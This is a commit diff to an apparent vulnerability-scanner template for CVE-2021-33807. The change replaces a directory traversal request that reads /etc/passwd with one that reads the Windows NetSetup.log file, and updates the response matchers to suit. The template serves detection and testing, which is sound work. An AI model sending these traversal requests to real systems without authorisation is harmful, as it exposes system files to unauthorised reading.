Update CVE-2021-33807.yaml

2021-08-16 13:55:31 +05:30 · 2021-08-16 13:55:31 +05:30 · 272dec095d
parent b426441cf4
commit 272dec095d
1 changed files with 10 additions and 4 deletions
--- a/cves/2021/CVE-2021-33807.yaml
+++ b/cves/2021/CVE-2021-33807.yaml
@ -13,14 +13,20 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../../../../../../../etc/passwd"
+      - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"

    matchers-condition: and
    matchers:

-      - type: regex
-        regex:
-          - "root:.*:0:0"
+      - type: word
+        words:
+          - "NetpDoDomainJoin:"
+        part: body
+
+      - type: word
+        words:
+          - "application/octet-stream"
+        part: header

      - type: status
        status: